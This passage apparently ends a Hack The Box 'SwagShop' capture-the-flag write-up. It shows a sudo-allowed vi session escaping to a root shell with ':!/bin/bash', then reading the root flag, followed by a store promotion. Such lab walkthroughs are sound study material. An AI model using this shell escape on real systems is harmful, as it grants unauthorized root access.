www-data@swagshop:/var/www$ sudo /usr/bin/vi /var/www/html/u505
From the vi session
:!/bin/bash

:!/bin/bash
root@swagshop:/var/www# whoami
root

Root flag

root@swagshop:/var/www# cat /root/root.txt
<ROOT_FLAG>

We are open! (Almost)
Join the beta HTB Swag Store!
https://hackthebox.store/password
PS: Use root flag as password!

References

Daniel Simao 03:57, 23 February 2020 (EST)